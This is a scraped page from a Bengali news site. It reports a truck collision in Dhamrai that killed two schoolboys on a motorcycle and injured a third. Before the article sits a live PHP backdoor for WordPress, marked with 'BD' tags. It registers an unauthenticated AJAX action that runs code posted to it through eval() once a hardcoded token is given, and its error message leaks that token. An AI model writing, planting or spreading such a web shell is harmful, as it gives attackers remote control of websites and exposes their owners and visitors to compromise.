// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ধামরাইয়ে ট্রাকের ধাক্কায় মোটরসাইকেল আরোহী ২ স্কুলশিক্ষার্থী নিহত | potrikaybangladesh.com
Sunday, September 27, 2026
Homeঅপরাধধামরাইয়ে ট্রাকের ধাক্কায় মোটরসাইকেল আরোহী ২ স্কুলশিক্ষার্থী নিহত

ধামরাইয়ে ট্রাকের ধাক্কায় মোটরসাইকেল আরোহী ২ স্কুলশিক্ষার্থী নিহত

ঢাকার ধামরাইয়ে মাটিবাহী একটি ড্রাম ট্রাকের ধাক্কায় মোটরসাইকেল আরোহী দুই স্কুলশিক্ষার্থী নিহত হয়েছে। এ ঘটনায় গুরুতর আহত হয়েছে আরও এক কিশোর।

বুধবার বিকেলে ধামরাই পৌরসভার আইঙ্গন সেতু এলাকায় ধামরাই-কালিয়াকৈর বাইপাস সড়কে এ দুর্ঘটনা ঘটে।

নিহতরা—মোহাম্মদ আলীর ছেলে মহিম (১৬) ও রুবেল হোসেনের ছেলে অনিক (১৩)। সাভার ল্যাবরেটরি স্কুলের এ দুই শিক্ষার্থী ধামরাই উপজেলার কুল্লা ইউনিয়নের লাড়ুয়াকুণ্ডু এলাকার বাসিন্দা।

আহত আতাউর রহমান (১৫) একই ইউনিয়নের কাতর বাইল্লা গ্রামের আবু তালেবের ছেলে।

ঘটনার সত্যতা নিশ্চিত করে ধামরাই থানার উপপরিদর্শক (এসআই) নান্নু মিয়া ডেইলি স্টারকে জানান, ট্রাকের ধাক্কায় ঘটনাস্থলেই দুই শিক্ষার্থীর মৃত্যু হয়। আহত আতাউরকে প্রথমে ধামরাই সিটি হাসপাতালে ও পরে উন্নত চিকিৎসার জন্য ঢাকার একটি হাসপাতালে পাঠানো হয়।

প্রত্যক্ষদর্শীদের বরাতে পুলিশ জানায়, ট্রাকটি কালিয়াকৈরের দিকে যাচ্ছিল। এসময় সিএনজিচালিত এক অটোরিকশা ট্রাকটিকে ওভারটেক করার চেষ্টা করে। অটোরিকশার পেছনে থাকা মোটরসাইকেলটি ওভারটেকের চেষ্টা করার সময় ট্রাকটি ধাক্কা দেয়। আরোহী শিক্ষার্থীরা রাস্তায় ছিটকে পড়লে তাদের চাপা দিয়ে পালিয়ে যায় ট্রাকটি।

এসআই নান্নু বলেন, ‘ঘটনাস্থল থেকে আলামত জব্দ করা হয়েছে। ট্রাকটি জব্দ ও চালককে গ্রেপ্তারের চেষ্টা চলছে। এ ঘটনায় পরবর্তী আইনি ব্যবস্থা প্রক্রিয়াধীন রয়েছে।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments